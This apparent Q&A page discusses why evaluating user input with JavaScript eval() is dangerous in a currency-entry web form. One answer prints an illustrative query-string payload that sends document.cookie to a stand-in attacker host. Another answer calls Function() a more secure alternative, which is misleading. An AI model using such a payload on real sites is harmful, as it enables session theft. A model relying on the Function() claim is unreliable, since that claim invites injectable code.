Possible Duplicate:
When is JavaScript’s eval() not evil?
I am writing a script in which users have to write in a currency amount, some examples could be (user input >> converts to), with USD as default currency:
50 >> 50.0 USD
50.5 >> 50.5 USD
50+1 USD >> 51.0 USD
50 GBP >> 50.0 GBP
I want to make this as smooth as possible, therefore I want to use JavaScript (it's a web app based on PHP/MySql + JavaScript). I want to use regex to filter the input, run it through eval()
and return it.
Is this a bad idea? I've read some topics about eval()
being a security issue. I just don't see how. A user can easily run JavaScript anyway?
Keep in mind that I will validate all input server-side with PHP at a later stage.
Malicious code : invoking eval can crash a computer. For example: if you use eval server-side and a mischievous user decides to use an infinite loop as their username. Terribly slow : the JavaScript language is designed to use the full gamut of JavaScript types (numbers, functions, objects, etc)… Not just strings!
Executing JavaScript from a string is an BIG security risk. With eval(), malicious code can run inside your application without permission. With eval(), third-party code can see the scope of your application, which can lead to possible attacks.
Calling eval() will be slower than using alternatives, because it has to call JavaScript interpreter, which will convert evaluated code to the machine language. That means if you run the code more than once, the browser will have to interpret the same code again, which is highly inefficient.
An alternative to eval is Function() . Just like eval() , Function() takes some expression as a string for execution, except, rather than outputting the result directly, it returns an anonymous function to you that you can call. `Function() is a faster and more secure alternative to eval().
You're right that an end user can easily execute arbitrary JavaScript anyway via the browser's developer console (I do this all the time). What you have to worry about is an attacker hijacking your feature that uses eval
for his own ends.
The reason eval
is generally considered dangerous is because it is very easy for untrusted code to sneak in. Consider a page that allows you specify input via query string, where the input box is prepopulated with the value in the query string.
An attacker could spread a link that contains code which steals a user's login cookie:
/some/url?amount=var i=new Image();i.src='http://badguy.ru/x?' + document.cookie;
(Obviously proper URL encoding is required; this is for illustration.)
Or, perhaps your PHP script echos posted data back into your form when validation fails. An attacker could create a specially crafted form that posts to your form with the same cookie-stealing code.
Each of these attacks can be mitigated by using httpOnly
cookies (to prevent stolen login cookies) or making sure that data is sanitized – but the point is this isn't even close to an exhaustive list of how things can go wrong. For example, an injected script could still insert 1000 in the amount field and try to transfer that amount to the attacker's account (if this is a money transfer page).
Even given the fact that you're using a regex to sanitize input doesn't necessarily protect you: it's possible to write arbitrary JavaScript entirely with brackets!
So the bottom line is that if you can make absolutely sure that the only way input makes its way into your text field is via user input, you're fine: the user hasn't gained anything they wouldn't be able to do otherwise via the console. However, if an attacker can somehow get their own data into that field, eval
ing it may expose you to a vulnerability.
See also:
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With